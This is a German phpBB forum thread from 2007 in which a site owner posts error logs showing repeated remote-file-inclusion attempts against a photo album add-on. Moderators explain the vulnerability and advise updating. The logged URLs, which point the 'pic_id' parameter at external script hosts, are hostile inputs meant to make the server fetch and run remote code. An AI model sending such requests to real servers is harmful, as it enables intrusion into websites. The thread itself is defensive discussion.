Attacke auf smartors Album?

Sicherheit den Webservers, Servers und rund um das phpBB
Gesperrt
Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Attacke auf smartors Album?

Beitrag von Holger » Mi 17.Okt, 2007 14:50

Hallo,

ich habe einen Mod eingebaut, der mir eine Mail zuschickt, sobald das Forum eine Fehlermeldung auswirft.
Dabei habe ich heute diese Fehlermeldung zugeschickt bekommen:
Fel Message:

Bilden existerar ej -> 0


IP: 89.240.190.107
USER: Anonymous
URL: /album_showpage.php?pic_id=http://amyru.h18.ru/images/cs.txt?

FORM:
Array
(
)
Was kann das gewesen sein?

/H

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » Mi 17.Okt, 2007 15:26

Da wurde Fremd-Code einzuschleusen.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Mi 17.Okt, 2007 15:30

+ "versucht"? ^a

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » Mi 17.Okt, 2007 15:32

Ups,ja. :!:
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Mi 17.Okt, 2007 16:23

Hm, sind da irgendwelche Löcher bekannt?

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Mi 17.Okt, 2007 16:23

In der neuesten zumindest nicht.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Mi 17.Okt, 2007 16:26

Tja, hehehe
Powered by Photo Album Addon 2.0.51

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Mi 17.Okt, 2007 16:30

Fleissiges Update ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Mi 17.Okt, 2007 17:00

:x:

Edit: heute ging es weiter.

Code: Alles auswählen

IP: 18.74.7.210
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.005flower.co.kr%2Fitem%2Fvusazam%2Fucuk%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 220.225.22.173
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.filter-international.com%2Flykoon%2Fcimawol%2Fdeqube%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 210.17.247.39
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.asais.info%2Fnewsletter%2Fincludes%2Fjurefim%2Fkom%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 146.164.34.14
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.planet-pictures.de%2Fcontent_system%2Fsehenab%2Fjajox%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 207.250.10.170
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.mflowermall.co.kr%2Fext%2Fwocesa%2Fvicobi%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 217.9.231.214
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.ahappychurch.org%2Fboardgido%2Fvopub%2Fuhi%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 85.200.239.74
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.oriolmanya.net%2Fnautilus%2FphpBB2%2Flanguage%2Flang_english%2Fsaj%2Fbecek%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 221.4.151.150
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.005flower.co.kr%2Fitem%2Fvusazam%2Fucuk%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 66.46.148.201
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14
Leider lässt sich da keine Einheitliche IP rauslesen, die man blocken könnte ...
Zuletzt geändert von Holger am Do 18.Okt, 2007 09:16, insgesamt 1-mal geändert.

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 18.Okt, 2007 09:35

Das wird auch so weiter gehen, da das Album nunmal für die "alte" Schwachstelle bekannt ist.
Album aktualisieren und vergessen...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Do 18.Okt, 2007 09:41

Naja, sagen wir mal so, das wird auch nach der Aktualisierung weitergehen.
Schaden kann es ja jetzt auch nicht anrichten ...

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 18.Okt, 2007 09:42

Jenau.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
Christian_N
User
User
Beiträge: 1806
Registriert: Sa 19.Feb, 2005 21:48
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Christian_N » Do 18.Okt, 2007 12:00

Vorne weg die album_showpage.php gehört nicht zu des normale Smartor Photo Album, ok die Version die drauf hast sollte schon aktualisiert werde da die ziemlich veralten ist, aber letztendlich wird das album addon "Supercharged Album Pack 1.5.1" angegriffen. Da aber soweit ich weiß keine neue Versionen mehr von diese raus gekommen sind schon seit Jahren, kann man höhste hoffen in drive Foren ggf. Bugfix für des Addon zu finden nur.
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Do 18.Okt, 2007 12:10

Ich benutze das Clown-Addon.
Es ist mir unmöglich das Album zu aktualisieren, da es keine Step-by-Step-Anleitung gibt.

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 18.Okt, 2007 15:24

Oh doch, die gibt es, nur nicht für das Clowns Pack.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Do 18.Okt, 2007 15:37

Tja, und das ist mein Problem ... Clowns Pack hat nämlich einige Dateien ersetzt ...

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29106
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 18.Okt, 2007 23:16

... die auch heute noch sicher sind ...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » Fr 19.Okt, 2007 07:41

Danke! :D

Gesperrt